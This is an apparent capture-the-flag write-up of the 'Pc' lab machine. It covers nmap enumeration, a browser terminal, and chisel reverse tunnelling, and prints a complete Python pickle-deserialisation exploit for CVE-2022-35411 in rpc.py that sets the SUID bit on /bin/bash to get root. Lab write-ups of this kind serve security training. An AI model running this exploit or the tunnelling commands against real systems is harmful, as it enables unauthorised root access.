In this walk through, we will be going through the Pc room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of getting initial access by accessing a browser terminal on port 8000 and for privilege escalation, exploitation of rpc.py via CVE-2022-35411 is required to get root on the target. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Pc |
IPaddress | 192.168.169.210 |
Difficulty | Intermediate |
OS | Linux |
Description | Pc is an Intermediate Linux machine which requires getting initial access by accessing a browser terminal on port 8000 and for privilege escalation, exploitation of rpc.py via CVE-2022-35411 is required to get root on the target. |
Enumeration:
- I started off with my regular aggressive nmap scan and found only two ports opened – 22 (SSH) and 80 (HTTP).
$ sudo nmap -A 192.168.169.210 Nmap scan report for 192.168.169.210 Host is up (0.26s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:8.2p1: | CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778 | C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT* | 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT* | PRION:CVE-2020-12062 5.0 https://vulners.com/prion/PRION:CVE-2020-12062 | PRION:CVE-2016-20012 5.0 https://vulners.com/prion/PRION:CVE-2016-20012 | CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062 | PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041 | CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041 | PRION:CVE-2020-15778 4.4 https://vulners.com/prion/PRION:CVE-2020-15778 | CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 | PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012 | PRION:CVE-2021-41617 3.5 https://vulners.com/prion/PRION:CVE-2021-41617 | PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368 |_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368 53/tcp filtered domain 8000/tcp open http-alt ttyd/1.7.3-a2312cb (libwebsockets/3.2.0) | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 Not Found | server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0) | content-type: text/html | content-length: 173 | <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>404</h1></body></html> | GetRequest: | HTTP/1.0 200 OK | server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0) | content-type: text/html | content-length: 677047 | <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>ttyd - Terminal</title><link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAcCAYAAAAAwr0iAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA0xpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMDY3IDc5LjE1Nzc0NywgMjAxNS8wMy8zMC0yMzo0MDo0MiAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vb | Socks5, X11Probe: | HTTP/1.0 403 Forbidden | server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0) | content-type: text/html | content-length: 173 |_ <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>403</h1></body></html> |_http-server-header: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0) |_http-title: ttyd - Terminal 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8000-TCP:V=7.80%I=7%D=2/5%Time=65C0FF6B%P=x86_64-pc-linux-gnu%r(Get SF:Request,1AFA,"HTTP/1\.0\x20200\x20OK\r\nserver:\x20ttyd/1\.7\.3-a2312cb SF:\x20\(libwebsockets/3\.2\.0\)\r\ncontent-type:\x20text/html\r\ncontent- SF:length:\x20677047\r\n\r\n<!DOCTYPE\x20html><html\x20lang=\"en\"><head>< SF:meta\x20charset=\"UTF-8\"><meta\x20http-equiv=\"X-UA-Compatible\"\x20co SF:ntent=\"IE=edge,chrome=1\"><title>ttyd\x20-\x20Terminal</title><link\x2 SF:0rel=\"icon\"\x20type=\"image/png\"\x20href=\"data:image/png;base64,iVB SF:ORw0KGgoAAAANSUhEUgAAACAAAAAcCAYAAAAAwr0iAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS SF:BJbWFnZVJlYWR5ccllPAAAA0xpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tld SF:CBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8\+IDx4OnhtcG1 SF:ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlID SF:UuNi1jMDY3IDc5LjE1Nzc0NywgMjAxNS8wMy8zMC0yMzo0MDo0MiAgICAgICAgIj4gPHJkZ SF:jpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50 SF:YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh SF:0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vb" SF:)%r(X11Probe,127,"HTTP/1\.0\x20403\x20Forbidden\r\nserver:\x20ttyd/1\.7 SF:\.3-a2312cb\x20\(libwebsockets/3\.2\.0\)\r\ncontent-type:\x20text/html\ SF:r\ncontent-length:\x20173\r\n\r\n<html><head><meta\x20charset=utf-8\x20 SF:http-equiv=\"Content-Language\"\x20content=\"en\"/><link\x20rel=\"style SF:sheet\"\x20type=\"text/css\"\x20href=\"/error\.css\"/></head><body><h1> SF:403</h1></body></html>")%r(FourOhFourRequest,127,"HTTP/1\.0\x20404\x20N SF:ot\x20Found\r\nserver:\x20ttyd/1\.7\.3-a2312cb\x20\(libwebsockets/3\.2\ SF:.0\)\r\ncontent-type:\x20text/html\r\ncontent-length:\x20173\r\n\r\n<ht SF:ml><head><meta\x20charset=utf-8\x20http-equiv=\"Content-Language\"\x20c SF:ontent=\"en\"/><link\x20rel=\"stylesheet\"\x20type=\"text/css\"\x20href SF:=\"/error\.css\"/></head><body><h1>404</h1></body></html>")%r(Socks5,12 SF:7,"HTTP/1\.0\x20403\x20Forbidden\r\nserver:\x20ttyd/1\.7\.3-a2312cb\x20 SF:\(libwebsockets/3\.2\.0\)\r\ncontent-type:\x20text/html\r\ncontent-leng SF:th:\x20173\r\n\r\n<html><head><meta\x20charset=utf-8\x20http-equiv=\"Co SF:ntent-Language\"\x20content=\"en\"/><link\x20rel=\"stylesheet\"\x20type SF:=\"text/css\"\x20href=\"/error\.css\"/></head><body><h1>403</h1></body> SF:</html>"); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=2/5%OT=22%CT=1%CU=37735%PV=Y%DS=4%DC=T%G=Y%TM=65C0FFAB OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F9%GCD=1%ISR=FC%TI=Z%II=I%TS=A)SEQ(SP=FA%G OS:CD=1%ISR=FD%TI=Z%TS=C)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7% OS:O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4 OS:=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R OS:=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40 OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN= OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=81CD%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 995/tcp) HOP RTT ADDRESS 1 255.30 ms 192.168.45.1 2 255.26 ms 192.168.45.254 3 255.84 ms 192.168.251.1 4 256.04 ms 192.168.169.210 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 96.69 seconds
- Enumerated the web server on port 80 and found a web browser command shell. Nice!
- Fired gobuster on the target to reveal some hidden directories but found nothing worth exploring.
gobuster dir -u http://192.168.169.210:8000/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
Initial Access:
- Next, upgraded the browser shell to a full-blown TTY reverse shell.
Privilege Escalation:
- Executed LinPEAS on the target to enumerate some privilege escalation vectors. Found out that a service is running on port 65432 on target localhost.
- Performed a port forwarding setup to forward the traffic from the target localhost port 65432 to my local port 65432.
# Attacker machine ./chisel server --reverse --port 9000 # Victim machine ./chisel client 192.168.45.164:9000 R:65432:127.0.0.1:65432
- Performed a nmap scan on the target port, seems like a HTTP service running but got nothing useful.
$ sudo nmap -A -p 65432 127.0.0.1 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-05 21:53 IST Nmap scan report for localhost (127.0.0.1) Host is up (0.000079s latency). PORT STATE SERVICE VERSION 65432/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Kerberos, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | content-type: text/plain; charset=utf-8 | Connection: close | Invalid HTTP request received. | GetRequest, HTTPOptions: | HTTP/1.1 405 Method Not Allowed | date: Mon, 05 Feb 2024 16:23:35 GMT | server: uvicorn | content-type: text/plain; charset=utf-8 |_ Connection: close 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port65432-TCP:V=7.80%I=7%D=2/5%Time=65C10B87%P=x86_64-pc-linux-gnu%r(Ge SF:nericLines,76,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-type:\x20t SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\nInvalid\x20H SF:TTP\x20request\x20received\.")%r(GetRequest,95,"HTTP/1\.1\x20405\x20Met SF:hod\x20Not\x20Allowed\r\ndate:\x20Mon,\x2005\x20Feb\x202024\x2016:23:35 SF:\x20GMT\r\nserver:\x20uvicorn\r\ncontent-type:\x20text/plain;\x20charse SF:t=utf-8\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,95,"HTTP/1\.1\x SF:20405\x20Method\x20Not\x20Allowed\r\ndate:\x20Mon,\x2005\x20Feb\x202024 SF:\x2016:23:35\x20GMT\r\nserver:\x20uvicorn\r\ncontent-type:\x20text/plai SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,76, SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-type:\x20text/plain;\x20 SF:charset=utf-8\r\nConnection:\x20close\r\n\r\nInvalid\x20HTTP\x20request SF:\x20received\.")%r(DNSVersionBindReqTCP,76,"HTTP/1\.1\x20400\x20Bad\x20 SF:Request\r\ncontent-type:\x20text/plain;\x20charset=utf-8\r\nConnection: SF:\x20close\r\n\r\nInvalid\x20HTTP\x20request\x20received\.")%r(DNSStatus SF:RequestTCP,76,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-type:\x20t SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\nInvalid\x20H SF:TTP\x20request\x20received\.")%r(SSLSessionReq,76,"HTTP/1\.1\x20400\x20 SF:Bad\x20Request\r\ncontent-type:\x20text/plain;\x20charset=utf-8\r\nConn SF:ection:\x20close\r\n\r\nInvalid\x20HTTP\x20request\x20received\.")%r(Te SF:rminalServerCookie,76,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-ty SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\nInva SF:lid\x20HTTP\x20request\x20received\.")%r(TLSSessionReq,76,"HTTP/1\.1\x2 SF:0400\x20Bad\x20Request\r\ncontent-type:\x20text/plain;\x20charset=utf-8 SF:\r\nConnection:\x20close\r\n\r\nInvalid\x20HTTP\x20request\x20received\ SF:.")%r(Kerberos,76,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-type:\ SF:x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\nInvalid\ SF:x20HTTP\x20request\x20received\.")%r(SMBProgNeg,76,"HTTP/1\.1\x20400\x2 SF:0Bad\x20Request\r\ncontent-type:\x20text/plain;\x20charset=utf-8\r\nCon SF:nection:\x20close\r\n\r\nInvalid\x20HTTP\x20request\x20received\."); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6.32 OS details: Linux 2.6.32 Network Distance: 0 hops OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 75.28 seconds
- At this point, i was looking for other privilege escalation vectors. On looking closely at the running processes list, found out that a python script rpc.py is running as root.
- Peeked into the python script reveals that it is running on port 65432.
CVE-2022–35411
- Looked online for any known exploits related to rpc.py and found a RCE.
Exploit: https://github.com/ehtec/rpcpy-exploit/blob/main/rpcpy-exploit.py
- Changed the payload in the exploit script. The complete script is given below where we will execute the bash binary by setting the SUID bit which in return give us a shell back as root.
import requests import pickle HOST = "127.0.0.1:65432" URL = f"http://{HOST}/sayhi" HEADERS ={ "serializer": "pickle" } def generate_payload(cmd): class PickleRce(object): def __reduce__(self): import os return os.system, (cmd,) payload = pickle.dumps(PickleRce()) print(payload) return payload def exec_command(cmd): payload = generate_payload(cmd) requests.post(url=URL, data=payload, headers=HEADERS) def main(): exec_command('id;chmod u+s /bin/bash') if __name__ == "__main__": main()
- Got the root shell. Captured the flag and marked the machine as complete.
user@pc:/home/user$ python3 expl.py b'x80x04x951x00x00x00x00x00x00x00x8cx05posixx94x8cx06systemx94x93x94x8cx16id;chmod u+s /bin/bashx94x85x94Rx94.' user@pc:/home/user$ ls -alh /bin/bash -rwsr-xr-x 1 root root 1.2M Apr 18 2022 /bin/bash user@pc:/home/user$ /bin/bash -p -i bash-5.0# id uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user) bash-5.0#
Also Read: PG – Marshalled
Conclusion:
So that was “Pc” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 8000 (HTTP). Enumerated the web server on port 8000 and found a terminal access via browser. Used the same to get initial access on the target. For privilege escalation, exploitation of rpc.py via CVE-2022-35411 to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.